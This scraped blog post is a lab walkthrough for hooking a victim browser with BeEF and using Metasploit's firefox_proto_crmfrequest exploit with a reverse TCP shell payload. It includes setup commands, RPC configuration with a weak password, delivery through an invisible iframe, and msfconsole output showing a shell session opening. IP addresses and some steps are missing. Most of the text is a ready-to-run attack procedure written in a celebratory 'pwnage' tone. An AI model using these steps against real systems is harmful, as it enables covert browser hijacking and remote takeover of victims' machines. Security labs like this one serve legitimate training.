from :


Bake the following VMs

  • For the purposes of this blog post, the Kali Linux VM has the IP address of and the Ubuntu VM has, you will need to change this to suit your local setup
  • I would use the NAT or Local Host-only networking configuration for your VMware setup

Kali Linux

  • Check that BEEF is installed
    • apt-get install beef-xss
  • Enable metasploit integration
    • Edit /etc/beef-xss/config.yaml
      • Set metasploit:
        enable: true
    • Edit /usr/share/beef-xss/extensions/metasploit/config.yaml
      • Set host and callback_host to be the IP address of the external interface of your Kali Linux VM
    • Start msfconsole and then issue the following command to enable the RPC server:
      • load msgrpc ServerHost=<your IP address> Pass=abc123
  • Start beef
    • cd /usr/share/beef-xss
    • beef -x
  • You can now browse to the BEEF UI (user/pass: beef) and start hooking browsers! πŸ™‚


  • Your browser will now be hooked into BEEF, if you go back to your Kali VM and check out the BEEF panel, you should see your browser hooked there.
  • There are all kinds of funky things that you can do, but for now, we’re going to concentrate on popping a shell

  • Kali Linux
  • Go to your running msfconsole and enter
    • use exploit/multi/browser/firefox_proto_crmfrequest
    • set PAYLOAD firefox/shell_reverse_tcp
    • set LHOST
    • exploit
  • Now metasploit should be running the exploit server and it will provide you with a target URL (, the next step is to get the victim browser to access it
  • The stealthy way to do this is to get BEEF to generate an invisible iframe for you on the victim browser
  • Go back to the BEEF panel and choose your hooked browser and then:
  • You should now see the following output in msfconsole:
    • [*] firefox_proto_crmfrequest – Gathering target information.
    • [*] firefox_proto_crmfrequest – Sending response HTML.
    • [*] firefox_proto_crmfrequest – Sending HTML [*] firefox_proto_crmfrequest – Sending the malicious addon
    • [*] Command shell session 1 opened ( -> at 2014-04-04 12:11:44 +0100
  • Congrats, you’ve now popped a shell! πŸ™‚
  • Confirm with: sessions -l
  • Start to interact with it with: sessions -i <session number>
  • Try something like:
    • uname -a
      Linux vuln-client 2.6.24-26-generic #1 SMP Tue Dec 1 18:37:31 UTC 2009 i686 GNU/Linux
  • Enjoy the pwnage, poppin’ shells like you’re at a seafood restaurant! πŸ˜‰